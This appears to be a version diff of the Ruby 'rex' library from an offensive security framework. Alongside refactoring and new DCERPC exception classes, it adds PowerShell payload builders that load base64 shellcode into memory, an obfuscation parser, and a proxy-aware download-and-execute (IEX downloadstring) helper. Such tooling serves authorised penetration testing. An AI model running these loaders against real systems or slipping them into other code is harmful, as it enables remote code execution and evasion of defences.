rex 2.0.8 → 2.0.9

data/lib/rex/{exploitation/powershell → powershell}/obfu.rb

@@ -3,7 +3,6 @@
 require 'rex/text'
 
 module Rex
-module Exploitation
 module Powershell
   module Obfu
     MULTI_LINE_COMMENTS_REGEX = Regexp.new(/<#(.*?)#>/m)
@@ -95,4 +94,3 @@ module Powershell
   end # Obfu
 end
 end
-end

data/lib/rex/{exploitation/powershell → powershell}/output.rb

@@ -4,7 +4,6 @@ require 'zlib'
 require 'rex/text'
 
 module Rex
-module Exploitation
 module Powershell
   module Output
     #
@@ -53,7 +52,7 @@ module Powershell
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  '$s=New-Object IO.MemoryStream(,'
+      psh_expression =  "$s=New-Object IO.MemoryStream(,"
       psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Read & delete the first two bytes due to incompatibility with MS
       psh_expression << '$s.ReadByte();'
@@ -76,10 +75,18 @@ module Powershell
     # Return Base64 encoded powershell code
     #
     # @return [String] Base64 encoded powershell code
-    def encode_code
+    def encode_code(eof = nil)
       @code = Rex::Text.encode_base64(Rex::Text.to_unicode(code))
     end
 
+    #
+    # Return ASCII powershell code from base64/unicode
+    #
+    # @return [String] ASCII powershell code
+    def decode_code
+      @code = Rex::Text.to_ascii(Rex::Text.decode_base64(code))
+    end
+
     #
     # Return a gzip compressed powershell code wrapped in decoder stub
     #
@@ -96,7 +103,7 @@ module Powershell
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  '$s=New-Object IO.MemoryStream(,'
+      psh_expression =  "$s=New-Object IO.MemoryStream(,"
       psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Uncompress and invoke the expression (execute)
       psh_expression << 'IEX (New-Object IO.StreamReader('
@@ -148,4 +155,3 @@ module Powershell
   end
 end
 end
-end

data/lib/rex/{exploitation/powershell → powershell}/param.rb

@@ -1,7 +1,6 @@
 # -*- coding: binary -*-
 
 module Rex
-module Exploitation
 module Powershell
   class Param
     attr_accessor :klass, :name
@@ -20,4 +19,3 @@ module Powershell
   end
 end
 end
-end

data/lib/rex/powershell/parser.rb

@@ -0,0 +1,182 @@
+# -*- coding: binary -*-
+
+module Rex
+module Powershell
+module Parser
+  # Reserved special variables
+  # Acquired with: Get-Variable | Format-Table name, value -auto
+  RESERVED_VARIABLE_NAMES = [
+    '$$',
+    '$?',
+    '$^',
+    '$_',
+    '$args',
+    '$ConfirmPreference',
+    '$ConsoleFileName',
+    '$DebugPreference',
+    '$Env',
+    '$Error',
+    '$ErrorActionPreference',
+    '$ErrorView',
+    '$ExecutionContext',
+    '$false',
+    '$FormatEnumerationLimit',
+    '$HOME',
+    '$Host',
+    '$input',
+    '$LASTEXITCODE',
+    '$MaximumAliasCount',
+    '$MaximumDriveCount',
+    '$MaximumErrorCount',
+    '$MaximumFunctionCount',
+    '$MaximumHistoryCount',
+    '$MaximumVariableCount',
+    '$MyInvocation',
+    '$NestedPromptLevel',
+    '$null',
+    '$OutputEncoding',
+    '$PID',
+    '$PROFILE',
+    '$ProgressPreference',
+    '$PSBoundParameters',
+    '$PSCulture',
+    '$PSEmailServer',
+    '$PSHOME',
+    '$PSSessionApplicationName',
+    '$PSSessionConfigurationName',
+    '$PSSessionOption',
+    '$PSUICulture',
+    '$PSVersionTable',
+    '$PWD',
+    '$ReportErrorShowExceptionClass',
+    '$ReportErrorShowInnerException',
+    '$ReportErrorShowSource',
+    '$ReportErrorShowStackTrace',
+    '$ShellId',
+    '$StackTrace',
+    '$true',
+    '$VerbosePreference',
+    '$WarningPreference',
+    '$WhatIfPreference'
+  ].map(&:downcase).freeze
+
+  #
+  # Get variable names from code, removes reserved names from return
+  #
+  # @return [Array] variable names
+  def get_var_names
+    our_vars = code.scan(/\$[a-zA-Z\-\_0-9]+/).uniq.flatten.map(&:strip)
+    our_vars.select { |v| !RESERVED_VARIABLE_NAMES.include?(v.downcase) }
+  end
+
+  #
+  # Get function names from code
+  #
+  # @return [Array] function names
+  def get_func_names
+    code.scan(/function\s([a-zA-Z\-\_0-9]+)/).uniq.flatten
+  end
+
+  #
+  # Attempt to find string literals in PSH expression
+  #
+  # @return [Array] string literals
+  def get_string_literals
+    code.scan(/@"(.+?)"@|@'(.+?)'@/m)
+  end
+
+  #
+  # Scan code and return matches with index
+  #
+  # @param str [String] string to match in code
+  # @param source [String] source code to match, defaults to @code
+  #
+  # @return [Array[String,Integer]] matched items with index
+  def scan_with_index(str, source = code)
+    ::Enumerator.new do |y|
+      source.scan(str) do
+        y << ::Regexp.last_match
+      end
+    end.map { |m| [m.to_s, m.offset(0)[0]] }
+  end
+
+  #
+  # Return matching bracket type
+  #
+  # @param char [String] opening bracket character
+  #
+  # @return [String] matching closing bracket
+  def match_start(char)
+    case char
+    when '{'
+      '}'
+    when '('
+      ')'
+    when '['
+      ']'
+    when '<'
+      '>'
+    else
+      fail ArgumentError, 'Unknown starting bracket'
+    end
+  end
+
+  #
+  # Extract block of code inside brackets/parenthesis
+  #
+  # Attempts to match the bracket at idx, handling nesting manually
+  # Once the balanced matching bracket is found, all script content
+  # between idx and the index of the matching bracket is returned
+  #
+  # @param idx [Integer] index of opening bracket
+  #
+  # @return [String] content between matching brackets
+  def block_extract(idx)
+    fail ArgumentError unless idx
+
+    if idx < 0 || idx >= code.length
+      fail ArgumentError, 'Invalid index'
+    end
+
+    start = code[idx]
+    stop = match_start(start)
+    delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/, code[idx + 1..-1])
+    delims.map { |x| x[1] = x[1] + idx + 1 }
+    c = 1
+    sidx = nil
+    # Go through delims till we balance, get idx
+    while (c != 0) && (x = delims.shift)
+      sidx = x[1]
+      x[0] == stop ? c -= 1 : c += 1
+    end
+
+    code[idx..sidx]
+  end
+
+  #
+  # Extract a block of function code
+  #
+  # @param func_name [String] function name
+  # @param delete [Boolean] delete the function from the code
+  #
+  # @return [String] function block
+  def get_func(func_name, delete = false)
+    start = code.index(func_name)
+
+    return nil unless start
+
+    idx = code[start..-1].index('{') + start
+    func_txt = block_extract(idx)
+
+    if delete
+      delete_code = code[0..idx]
+      delete_code << code[(idx + func_txt.length)..-1]
+      @code = delete_code
+    end
+
+    Function.new(func_name, func_txt)
+  end
+end # Parser
+end
+end
+

data/lib/rex/powershell/payload.rb

@@ -0,0 +1,78 @@
+# -*- coding: binary -*-
+require 'rex/random_identifier_generator'
+
+module Rex
+module Powershell
+module Payload
+
+  def self.read_replace_script_template(template_path, filename, hash_sub)
+    template_pathname = File.join(template_path, filename)
+    template = ''
+    File.open(template_pathname, "rb") {|f| template = f.read}
+    template % hash_sub
+  end
+
+  def self.to_win32pe_psh_net(template_path, code)
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:var_code)
+    rig.init_var(:var_kernel32)
+    rig.init_var(:var_baseaddr)
+    rig.init_var(:var_threadHandle)
+    rig.init_var(:var_output)
+    rig.init_var(:var_codeProvider)
+    rig.init_var(:var_compileParams)
+    rig.init_var(:var_syscode)
+    rig.init_var(:var_temp)
+
+    hash_sub = rig.to_h
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
+
+    read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+  def self.to_win32pe_psh(template_path, code)
+    hash_sub = {}
+    hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_win32_func]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+
+    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
+
+    read_replace_script_template(template_path, "to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+  #
+  # Reflection technique prevents the temporary .cs file being created for the .NET compiler
+  # Tweaked by shellster
+  # Originally from PowerSploit
+  #
+  def self.to_win32pe_psh_reflection(template_path, code)
+    # Intialize rig and value names
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:func_get_proc_address)
+    rig.init_var(:func_get_delegate_type)
+    rig.init_var(:var_code)
+    rig.init_var(:var_module)
+    rig.init_var(:var_procedure)
+    rig.init_var(:var_unsafe_native_methods)
+    rig.init_var(:var_parameters)
+    rig.init_var(:var_return_type)
+    rig.init_var(:var_type_builder)
+    rig.init_var(:var_buffer)
+    rig.init_var(:var_hthread)
+
+    hash_sub = rig.to_h
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
+
+    read_replace_script_template(template_path,
+                                 "to_mem_pshreflection.ps1.template",
+                                 hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+end
+end
+end

data/lib/rex/{exploitation/powershell → powershell}/psh_methods.rb

@@ -1,7 +1,6 @@
 # -*- coding: binary -*-
 
 module Rex
-module Exploitation
 module Powershell
   ##
   # Convenience methods for generating powershell code in Ruby
@@ -73,7 +72,22 @@ module Powershell
     def self.ignore_ssl_certificate
       '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
     end
+
+    #
+    # Use the default system web proxy and credentials to download a URL
+    # as a string and execute the contents as PowerShell
+    #
+    # @param url [String] string to download
+    #
+    # @return [String] PowerShell code to download a URL
+    def self.proxy_aware_download_and_exec_string(url)
+      var = Rex::Text.rand_text_alpha(1)
+      cmd = "$#{var}=new-object net.webclient;"
+      cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
+      cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
+      cmd << "IEX $#{var}.downloadstring('#{url}');"
+      cmd
+    end
   end
 end
 end
-end

data/lib/rex/{exploitation/powershell → powershell}/script.rb

@@ -4,7 +4,6 @@ require 'rex'
 require 'forwardable'
 
 module Rex
-module Exploitation
 module Powershell
   class Script
     attr_accessor :code
@@ -19,7 +18,7 @@ module Powershell
     # eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
     def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
                    :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub, :dump, :match, :to_sym,
-                   :enum_for, :display, :tr_s!, :freeze, :gsub, :split, :rindex, :<<, :<=>, :+, :lstrip!,
+                   :enum_for, :display, :tr_s!, :freeze, :gsub!, :split, :rindex, :<<, :<=>, :+, :lstrip!,
                    :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
                    :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
                    :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
@@ -38,7 +37,7 @@ module Powershell
 
       begin
         # Open code file for reading
-        fd = ::File.new(code, 'rb')
+        fd = ::File.new(code || '', 'rb')
         while (line = fd.gets)
           @code << line
         end
@@ -96,4 +95,3 @@ module Powershell
   end # class Script
 end
 end
-end

data/lib/rex/proto/dcerpc/client.rb

@@ -57,7 +57,7 @@ require 'rex/proto/smb/exceptions'
     case self.handle.protocol
       when 'ncacn_ip_tcp'
         if self.socket.type? != 'tcp'
-          raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
+          raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
         end
       when 'ncacn_np'
         if self.socket.class == Rex::Proto::SMB::SimpleClient::OpenPipe
@@ -65,11 +65,11 @@ require 'rex/proto/smb/exceptions'
         elsif self.socket.type? == 'tcp'
           self.smb_connect()
         else
-          raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
+          raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
         end
         # No support ncacn_ip_udp (is it needed now that its ripped from Vista?)
       else
-        raise "Unsupported protocol : #{self.handle.protocol}"
+        raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "Unsupported protocol : #{self.handle.protocol}"
     end
   end
 
@@ -255,7 +255,7 @@ require 'rex/proto/smb/exceptions'
       bind, context = Rex::Proto::DCERPC::Packet.make_bind(*self.handle.uuid)
     end
 
-    raise 'make_bind failed' if !bind
+    raise ::Rex::Proto::DCERPC::Exceptions::BindError, 'make_bind failed' if !bind
 
     self.write(bind)
     raw_response = self.read()
@@ -264,11 +264,11 @@ require 'rex/proto/smb/exceptions'
     self.last_response = response
     if response.type == 12 or response.type == 15
       if self.last_response.ack_result[context] == 2
-        raise "Could not bind to #{self.handle}"
+        raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
       end
       self.context = context
     else
-      raise "Could not bind to #{self.handle}"
+      raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
     end
   end
 

data/lib/rex/proto/dcerpc/exceptions.rb

@@ -132,6 +132,32 @@ class NoResponse < Error
   end
 end
 
+class BindError < Error
+    def initialize(message=nil)
+        @message = message
+    end
+
+    def to_s
+        str = 'Failed to bind.'
+        if @message
+            str += " #{@message}"
+        end
+    end
+end
+
+class InvalidSocket < Error
+    def initialize(message=nil)
+        @message = message
+    end
+
+    def to_s
+        str = 'Invalid Socket.'
+        if @message
+            str += " #{@message}"
+        end
+    end
+end
+
 class InvalidPacket < Error
   def initialize(message = nil)
     @message = message